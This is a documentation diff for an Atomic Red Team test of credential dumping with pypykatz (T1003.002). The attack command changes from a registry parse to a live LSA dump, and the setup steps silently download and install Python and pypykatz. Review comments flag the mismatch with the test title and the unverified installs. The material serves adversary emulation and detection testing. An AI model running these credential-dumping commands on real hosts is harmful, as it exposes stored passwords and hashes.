Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2024-02-26 15:24:49 +00:00
parent c09d2a3748
commit e9b9f2ed7b
17 changed files with 451 additions and 262 deletions
+26 -20
@@ -82,7 +82,9 @@ del %temp%\security >nul 2> nul
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
**Supported Platforms:** Windows
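Review bot: the added description line says the virtual environment "can be deleted manually post test execution" but only locates it as "within the External Payloads folder", and no cleanup command appears in the visible hunks. Consider naming the `venv_path` input in this sentence, or adding a cleanup command that removes `#{venv_path}`, so the environment and the pypykatz install inside it do not stay on the host after the test.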
@@ -93,47 +95,51 @@ Parses registry hives to obtain stored credentials
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live registry
"#{venv_path}\Scripts\pypykatz" live lsa
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have pip installed
##### Description: Computer must have venv configured at #{venv_path}
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```powershell
py -m venv "#{venv_path}"
```
##### Description: pypykatz must be installed and part of PATH
##### Description: pypykatz must be installed
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```
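Review bot: the attack command changes from `pypykatz live registry` to `"#{venv_path}\Scripts\pypykatz" live lsa`, so the test no longer matches its title ("Registry parse with pypykatz") or its description ("Parses registry hives"). If only the executable path was meant to change, keep the `live registry` subcommand; if the switch to `live lsa` is intended, the title and description should follow, because anyone validating detections against this test would be exercising different behaviour than the documentation states. Separately, in the Python prerequisite the installer is downloaded and started with `InstallAllUsers=1` without a hash or signature check, and the pypykatz install is unpinned with its output piped to `Out-Null`, so a failed or unexpected install is only noticed at the next prerequisite check; pinning a version and verifying the installer before `Start-Process` would make the setup reproducible.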